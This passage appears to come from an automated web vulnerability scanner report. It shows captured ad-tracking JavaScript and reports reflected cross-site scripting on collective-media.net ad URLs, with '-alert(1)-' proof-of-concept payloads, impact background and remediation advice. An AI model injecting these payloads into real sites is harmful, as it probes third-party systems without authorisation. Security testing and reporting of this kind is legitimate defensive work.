    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-95851164_1289163509","http://vulnerable.ad.partner/adj/idgt.technewsworld/home_below;net=idgt;u=,idgt-95851164_1289163509,11c4bc59fd87e17,none,idgt.virtualization_h-idgt.virtualization_l-idgt.virtualization_m;;sec=7ce54'-alert(1)-'ccb6ed6ed46;contx=none;dc=d;btg=idgt.virtualization_h;btg=idgt.virtualization_l;btg=idgt.virtualization_m?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731");CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=833160973;redirect=http://a.collective-media.net/datapair?net=qc&id=11c4bc59fd87e17&segs=!qcsegs&op=add");]]> false
    5236992084805927936 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    493d4'-alert(1)-'09816400609 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    '); document.write(''); ]]> false